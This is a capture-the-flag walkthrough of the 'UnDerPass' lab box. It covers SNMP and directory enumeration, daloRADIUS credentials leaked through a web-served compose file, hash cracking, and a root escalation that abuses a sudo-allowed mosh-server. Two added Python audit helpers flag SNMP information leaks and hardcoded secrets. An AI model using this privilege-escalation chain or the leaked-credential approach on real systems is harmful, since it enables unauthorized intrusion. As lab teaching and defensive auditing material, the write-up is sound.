fscan only turned up ports 22, 80 and 110.
Learned a new information-gathering trick: snmpwalk.
The snmpwalk command pulls the Management Information Base (MIB) data from the target host underpass.htb:
```
┌──(root㉿kali)-[~]
└─
Created directory: /var/lib/snmp/cert_indexes
iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (11947193) 1 day, 9:11:11.93
iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"
iso.3.6.1.2.1.1.6.0 = STRING: "Nevada, U.S.A. but not Vegas"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (11948492) 1 day, 9:11:24.92
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E9 03 17 04 35 2C 00 2B 00 00
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.15.0-126-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro net.ifnames=0 biosdevname=0 "
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 217
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
End of MIB
```
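The walk above is a good illustration of how much the RFC 1213 system group gives away when a read community is reachable: sysContact leaks a username, sysName names the application, sysDescr and the boot parameters give the exact kernel. Below is an added audit helper (my own code, not from the writeup) that parses snmpwalk output and flags those fields; the sample lines are a constructed excerpt of the output above.

```python
import re

# Constructed sample: an excerpt of the snmpwalk output above ("iso" is the 1 arc).
SAMPLE = """\
iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP x86_64"
iso.3.6.1.2.1.1.3.0 = Timeticks: (11947193) 1 day, 9:11:11.93
iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"
iso.3.6.1.2.1.1.6.0 = STRING: "Nevada, U.S.A. but not Vegas"
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.15.0-126-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro"
"""

# RFC 1213 system group (1.3.6.1.2.1.1) plus hrSystemInitialLoadParameters (HOST-RESOURCES-MIB).
NAMES = {
    "1.3.6.1.2.1.1.1.0": "sysDescr",
    "1.3.6.1.2.1.1.4.0": "sysContact",
    "1.3.6.1.2.1.1.5.0": "sysName",
    "1.3.6.1.2.1.1.6.0": "sysLocation",
    "1.3.6.1.2.1.25.1.4.0": "hrSystemInitialLoadParameters",
}
LINE = re.compile(r'^(\S+) = (\w[\w-]*): (.*)$')   # "<oid> = <TYPE>: <value>"
EMAIL = re.compile(r'[\w.+-]+@[\w-]+\.[\w.-]+')

def parse_snmpwalk(text):
    """Return {numeric_oid: (type, value)}; the 'iso.' prefix is rewritten to '1.'."""
    out = {}
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            oid = m.group(1).replace("iso.", "1.", 1)
            out[oid] = (m.group(2), m.group(3).strip().strip('"'))
    return out

def disclosures(text):
    """List (field, why it matters, value) for system-group fields worth reviewing."""
    findings = []
    for oid, (_, value) in parse_snmpwalk(text).items():
        name = NAMES.get(oid)
        if not name:
            continue
        if EMAIL.search(value):
            findings.append((name, "contact e-mail / username hint", value))
        elif name == "sysName" and re.search(r'radius|server', value, re.I):
            findings.append((name, "application named in banner", value))
        elif name in ("sysDescr", "hrSystemInitialLoadParameters"):
            findings.append((name, "kernel / boot details", value))
        elif name == "sysLocation":
            findings.append((name, "physical location", value))
    return findings
```

Feed it the full walk (snmpwalk ... > walk.txt) and review every finding against what the agent actually needs to publish; the fix on the agent side is a restricted view or SNMPv3 rather than a guessable v2c community.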
So the server is running daloRADIUS.
A quick search shows its directory layout is usually /daloradius/…
Further directory scanning:
```
E:\小工具\ONE-FOX 集成工具箱_V8 公开版_by 狐狸\gui_scan\dirsearch>python dirsearch.py -u http://underpass.htb/daloradius/

  _|. _ _  _  _  _ _|_    v0.4.3 by 鹏组安全
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11714

Output File: E:\小工具\ONE-FOX 集成工具箱_V8 公开版_by 狐狸\gui_scan\dirsearch\reports\http_underpass.htb\_daloradius__25-03-23_13-16-04.txt

Target: http://underpass.htb/

[13:16:04] Starting: daloradius/
[13:16:09] 200 -  221B - /daloradius/.gitignore
[13:16:31] 301 -  323B - /daloradius/app  ->  http://underpass.htb/daloradius/app/
[13:16:36] 200 -   24KB - /daloradius/ChangeLog
[13:16:41] 301 -  323B - /daloradius/doc  ->  http://underpass.htb/daloradius/doc/
[13:16:41] 200 -    2KB - /daloradius/Dockerfile
[13:16:41] 200 -    2KB - /daloradius/docker-compose.yml
[13:16:52] 301 -  327B - /daloradius/library  ->  http://underpass.htb/daloradius/library/
[13:16:52] 200 -   18KB - /daloradius/LICENSE
[13:17:05] 200 -   10KB - /daloradius/README.md
[13:17:13] 301 -  325B - /daloradius/setup  ->  http://underpass.htb/daloradius/setup/

Task Completed

E:\小工具\ONE-FOX 集成工具箱_V8 公开版_by 狐狸\gui_scan\dirsearch>python dirsearch.py -u http://underpass.htb/daloradius/app

  _|. _ _  _  _  _ _|_    v0.4.3 by 鹏组安全
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11714

Output File: E:\小工具\ONE-FOX 集成工具箱_V8 公开版_by 狐狸\gui_scan\dirsearch\reports\http_underpass.htb\_daloradius_app_25-03-23_13-38-16.txt

Target: http://underpass.htb/

[13:38:16] Starting: daloradius/app/
[13:40:08] 301 -  330B - /daloradius/app/common  ->  http://underpass.htb/daloradius/app/common/
[13:42:30] 301 -  329B - /daloradius/app/users  ->  http://underpass.htb/daloradius/app/users/
[13:42:30] 200 -    2KB - /daloradius/app/users/login.php
[13:42:30] 302 -    0B - /daloradius/app/users/  ->  home-main.php
```
But the login page gets me nowhere.
Keep browsing the other files:
underpass.htb/daloradius/docker-compose.yml
```yaml
version: "3"
services:
  radius-mysql:
    image: mariadb:10
    container_name: radius-mysql
    restart: unless-stopped
    environment:
      - MYSQL_DATABASE=radius
      - MYSQL_USER=radius
      - MYSQL_PASSWORD=radiusdbpw
      - MYSQL_ROOT_PASSWORD=radiusrootdbpw
    volumes:
      - "./data/mysql:/var/lib/mysql"
  radius:
    container_name: radius
    build:
      context: .
      dockerfile: Dockerfile-freeradius
    restart: unless-stopped
    depends_on:
      - radius-mysql
    ports:
      - '1812:1812/udp'
      - '1813:1813/udp'
    environment:
      - MYSQL_HOST=radius-mysql
      - MYSQL_PORT=3306
      - MYSQL_DATABASE=radius
      - MYSQL_USER=radius
      - MYSQL_PASSWORD=radiusdbpw
      # Optional settings
      - DEFAULT_CLIENT_SECRET=testing123
    volumes:
      - ./data/freeradius:/data
    # If you want to disable debug output, remove the command parameter
    command: -X
  radius-web:
    build: .
    container_name: radius-web
    restart: unless-stopped
    depends_on:
      - radius
      - radius-mysql
    ports:
      - '80:80'
      - '8000:8000'
    environment:
      - MYSQL_HOST=radius-mysql
      - MYSQL_PORT=3306
      - MYSQL_DATABASE=radius
      - MYSQL_USER=radius
      - MYSQL_PASSWORD=radiusdbpw
      # Optional Settings:
      - DEFAULT_CLIENT_SECRET=testing123
      - DEFAULT_FREERADIUS_SERVER=radius
      - MAIL_SMTPADDR=127.0.0.1
      - MAIL_PORT=25
      - MAIL_FROM=root@daloradius.xdsl.by
      - MAIL_AUTH=
    volumes:
      - ./data/daloradius:/data
```
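The compose file above ships database passwords and the RADIUS client secret as literals, and it is served by the web root, so anyone who finds it has them. As an added check (my own code, not the writeup's or daloRADIUS's), the script below walks a compose file's environment lists and reports secret-like keys whose value is a literal rather than a ${VAR} reference; the sample is a constructed, trimmed copy of that file with one ${MYSQL_PASSWORD} reference added for contrast.

```python
import re

# Constructed sample: trimmed from the docker-compose.yml above, plus one ${...} reference.
SAMPLE_COMPOSE = """\
version: "3"
services:
  radius-mysql:
    image: mariadb:10
    environment:
      - MYSQL_USER=radius
      - MYSQL_PASSWORD=radiusdbpw
      - MYSQL_ROOT_PASSWORD=radiusrootdbpw
  radius-web:
    build: .
    environment:
      - MYSQL_PASSWORD=${MYSQL_PASSWORD}
      - DEFAULT_CLIENT_SECRET=testing123
      - MAIL_AUTH=
"""

SENSITIVE = re.compile(r'PASS|PASSWD|PASSWORD|SECRET|TOKEN|KEY', re.I)
SERVICE = re.compile(r'^  ([A-Za-z0-9_.-]+):\s*$')      # two-space indent: a key under services:
ENV_ITEM = re.compile(r'^\s*-\s*([A-Z0-9_]+)=(.*)$')   # "- KEY=value" list form of environment:
REFERENCE = re.compile(r'^\$\{?[A-Z0-9_]+\}?$')        # ${VAR} / $VAR, resolved at deploy time

def hardcoded_secrets(text):
    """Return (service, key, value) for secret-like env vars given as literal values."""
    findings, service = [], None
    for line in text.splitlines():
        m = SERVICE.match(line)
        if m:
            service = m.group(1)
            continue
        m = ENV_ITEM.match(line)
        if not m or not SENSITIVE.search(m.group(1)):
            continue
        key, value = m.group(1), m.group(2).strip().strip('"\'')
        if value == "" or REFERENCE.match(value):
            continue    # empty, or injected from the deploy environment: not a literal leak
        findings.append((service, key, value))
    return findings
```

Anything it reports should move to an env file or a secrets store, and the compose file itself should not be reachable under the web root at all.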
underpass.htb/daloradius/doc/install/INSTALL
Swapped in the dirbuster wordlist and rescanned; that turned up the operators directory.
Found the user list.
Looking the hash up directly or running hashcat both work.
Logged in and got user.
Privilege escalation
```
svcMosh@underpass:~$ find / -perm -u=s -type f 2>/dev/null
/usr/libexec/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chsh
/usr/bin/mount
/usr/bin/fusermount3
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/umount
svcMosh@underpass:~$ sudo -l
Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server
svcMosh@underpass:~$
```
Let's run it and see:
```
svcMosh@underpass:~$ /usr/bin/mosh-server

MOSH CONNECT 60001 DiiNVEgq4M56rujxrqcQBA

mosh-server (mosh 1.3.2) [build mosh 1.3.2]
Copyright 2012 Keith Winstein <mosh-devel@mit.edu>
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

[mosh-server detached, pid = 1580]
```
This starts a mosh-server; it is a client/server arrangement much like ssh.
Check --help for the connection command:
```
svcMosh@underpass:~$ mosh -h
Usage: /usr/bin/mosh [options] [--] [user@]host [command ...]
        --client=PATH        mosh client on local machine
                                (default: "mosh-client")
        --server=COMMAND     mosh server on remote machine
                                (default: "mosh-server")

        --predict=adaptive   local echo for slower links [default]
-a      --predict=always     use local echo even on fast links
-n      --predict=never      never use local echo
        --predict=experimental  aggressively echo even when incorrect

-4      --family=inet        use IPv4 only
-6      --family=inet6       use IPv6 only
        --family=auto        autodetect network type for single-family hosts only
        --family=all         try all network types
        --family=prefer-inet use all network types, but try IPv4 first [default]
        --family=prefer-inet6 use all network types, but try IPv6 first
-p PORT[:PORT2]
        --port=PORT[:PORT2]  server-side UDP port or range
                                (No effect on server-side SSH port)
        --bind-server={ssh|any|IP}  ask the server to reply from an IP address
                                (default: "ssh")

        --ssh=COMMAND        ssh command to run when setting up session
                                (example: "ssh -p 2222")
                                (default: "ssh")

        --no-ssh-pty         do not allocate a pseudo tty on ssh connection

        --no-init            do not send terminal initialization string

        --local              run mosh-server locally without using ssh

        --experimental-remote-ip=(local|remote|proxy)  select the method for
                             discovering the remote IP address to use for mosh
                             (default: "proxy")

        --help               this message
        --version            version and copyright information

Please report bugs to mosh-devel@mit.edu.
Mosh home page: https://mosh.org
```
So, directly:
```
mosh --server="sudo /usr/bin/mosh-server" 127.0.0.1
```
An ssh login prompt pops up straight away, and that drops into root.